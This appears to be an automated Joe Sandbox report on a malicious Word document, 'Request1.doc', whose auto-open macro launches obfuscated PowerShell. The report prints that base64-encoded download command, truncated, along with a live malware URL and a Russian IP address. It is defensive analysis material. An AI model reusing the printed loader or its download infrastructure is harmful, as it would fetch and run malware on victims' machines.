Loading ...

Analysis Report Request1.doc

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:113893
Start date:01.03.2019
Start time:16:24:45
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 3m 12s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Request1.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.evad.winDOC@2/10@1/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold800 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface1Winlogon Helper DLLPort MonitorsDisabling Security Tools1Credential DumpingProcess Discovery1Application Deployment SoftwareData from Local SystemData CompressedStandard Non-Application Layer Protocol3
Replication Through Removable MediaPowerShell3Port MonitorsAccessibility FeaturesDeobfuscate/Decode Files or Information1Network SniffingSecurity Software Discovery11Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol3
Drive-by CompromiseScripting12Accessibility FeaturesPath InterceptionScripting12Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol
Exploit Public-Facing ApplicationExploitation for Client Execution3System FirmwareDLL Search Order HijackingObfuscated Files or Information1Credentials in FilesFile and Directory Discovery1Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasqueradingAccount ManipulationSystem Information Discovery22Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://dqfk32.company/iwp01-2ksm/20918201.php?l=ukotz10.sapAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: Request1.docvirustotal: Detection: 17%Perma Link

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick LaunchJump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: dqfk32.company
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49220 -> 95.142.47.75:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49220 -> 95.142.47.75:80

Networking:

barindex
Connects to country known for bullet proof hostersShow sources
Source: unknownNetwork traffic detected: IP: 95.142.47.75 Russian Federation
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /iwp01-2ksm/20918201.php?l=ukotz10.sap HTTP/1.1Host: dqfk32.companyConnection: Keep-Alive
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /iwp01-2ksm/20918201.php?l=ukotz10.sap HTTP/1.1Host: dqfk32.companyConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: dqfk32.company
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Mar 2019 15:25:17 GMTServer: Apache/2.2.15 (CentOS)X-Powered-By: PHP/7.2.15Content-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.c
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.compa
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01-
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01-2k
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01-2ksm/209
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01-2ksm/2091
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01-2ksm/20918201.ph
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01-2ksm/20918201.php?l=
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01-2ksm/20918201.php?l=uk
Source: powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01-2ksm/20918201.php?l=ukotz1
Source: powershell.exe, 00000001.00000002.2000188646.00355000.00000004.sdmp, powershell.exe, 00000001.00000002.2001943345.01C89000.00000004.sdmpString found in binary or memory: http://dqfk32.company/iwp01-2ksm/20918201.php?l=ukotz10.sap
Source: powershell.exe, 00000001.00000002.2002539130.02002000.00000004.sdmpString found in binary or memory: http://dqfk32.companyx&

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable editing" button on the top yellow bar, and then click "Enable content"
Source: Document image extraction number: 0Screenshot OCR: Enable content"
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 95.142.47.75 80Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: Request1.docOLE, VBA macro line: Sub autoopen()
Document contains embedded VBA macrosShow sources
Source: Request1.docOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: Request1.docOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: Request1.docOLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document typeShow sources
Source: Request1.docOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Yara signature matchShow sources
Source: 00000001.00000000.1987665109.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.2000179213.00330000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.1999709173.00040000.00000002.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.1999675204.00020000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.2000624453.01280000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.1988004621.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.2000073133.00150000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Classification labelShow sources
Source: classification engineClassification label: mal80.evad.winDOC@2/10@1/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$quest1.docJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR6CB1.tmpJump to behavior
Document contains summary information with irregular field valuesShow sources
Source: Request1.docOLE document summary: title field not present or empty
Source: Request1.docOLE document summary: author field not present or empty
Source: Request1.docOLE document summary: edited time not present or 0
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: Request1.docvirustotal: Detection: 17%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersHeLl -e JABoADUAXwBfADkAXwBfADkAPQAoACcARQAwACcAKwAnADAAOABfADQAJwArACcAOAAnACkAOwAkAEYAXwA0ADUAOQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHUANQBfAF8ANwBfADUAMQA9ACgAJwBoAHQAdABwADoALwAvAGQAJwArACcAcQBmAGsAJwArACcAMwAyAC4AYwAnACsAJwBvAG0AcABhACcAKwAnAG4AeQAvAGkAdwBwADAAMQAnACsAJwAtACcAKwAnADIAawAnACsAJwBzAG0ALwAyADAAOQAnACsAJwAxACcAKwAnADgAMgAwADEALgBwAGgAJwArACcAcAA/AGwAPQAnACsAJwB1AGsAJwArACcAbwB0AHoAMQAnACsAJwAwAC4AcwBhAHAAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQQA2ADMAXwA4ADAAPQAoACcAaAA0AF8AJwArACcAMQAwADYAMAAnACkAOwAkAE4AXwA3ADYAMgA3ADcAIAA9ACAAKAAnADEAJwArACcANgAzACcAKQA7ACQASgBfAF8ANwBfAF8AMwA9ACgAJwBpADcAXwAzADkAJwArACcANAAnACsAJwA3AF8AJwApADsAJABiADMAOABfADUAOQBfAF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE4AXwA3ADYAMgA3ADcAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABoAF8AOAAxADIAMAAgAGkAbgAgACQAdQA1AF8AXwA3AF8ANQAxACkAewB0AHIAeQB7ACQARgBfADQANQA5AF8ALgBEAG8AdwBuAGwAb
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Windows\dll\System.pdb source: powershell.exe, 00000001.00000002.2000613196.01277000.00000004.sdmp
Source: Binary string: C:\Windows\System.pdb/ source: powershell.exe, 00000001.00000002.2000613196.01277000.00000004.sdmp
Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000001.00000002.2003887718.050CD000.00000004.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb.Au source: powershell.exe, 00000001.00000002.2003887718.050CD000.00000004.sdmp
Source: Binary string: mation.pdb source: powershell.exe, 00000001.00000002.2000395556.0041E000.00000004.sdmp
Source: Binary string: #_indows\System.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb5FED}Microsoft ISATAP Adapter{1D851F55-12FB-485B-854F-60B704B43A43}0 source: powershell.exe, 00000001.00000002.2000395556.0041E000.00000004.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000001.00000002.2003887718.050CD000.00000004.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: powershell.exe, 00000001.00000002.2000613196.01277000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000001.00000002.2000613196.01277000.00000004.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.2000613196.01277000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000001.00000002.2003382117.03AB0000.00000002.sdmp

Data Obfuscation:

barindex
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: Request1.docStream path 'VBA/w6_32_6_' : High number of string operations
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersHeLl -e JABoADUAXwBfADkAXwBfADkAPQAoACcARQAwACcAKwAnADAAOABfADQAJwArACcAOAAnACkAOwAkAEYAXwA0ADUAOQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHUANQBfAF8ANwBfADUAMQA9ACgAJwBoAHQAdABwADoALwAvAGQAJwArACcAcQBmAGsAJwArACcAMwAyAC4AYwAnACsAJwBvAG0AcABhACcAKwAnAG4AeQAvAGkAdwBwADAAMQAnACsAJwAtACcAKwAnADIAawAnACsAJwBzAG0ALwAyADAAOQAnACsAJwAxACcAKwAnADgAMgAwADEALgBwAGgAJwArACcAcAA/AGwAPQAnACsAJwB1AGsAJwArACcAbwB0AHoAMQAnACsAJwAwAC4AcwBhAHAAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQQA2ADMAXwA4ADAAPQAoACcAaAA0AF8AJwArACcAMQAwADYAMAAnACkAOwAkAE4AXwA3ADYAMgA3ADcAIAA9ACAAKAAnADEAJwArACcANgAzACcAKQA7ACQASgBfAF8ANwBfAF8AMwA9ACgAJwBpADcAXwAzADkAJwArACcANAAnACsAJwA3AF8AJwApADsAJABiADMAOABfADUAOQBfAF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE4AXwA3ADYAMgA3ADcAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABoAF8AOAAxADIAMAAgAGkAbgAgACQAdQA1AF8AXwA3AF8ANQAxACkAewB0AHIAeQB7ACQARgBfADQANQA5AF8ALgBEAG8AdwBuAGwAb

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
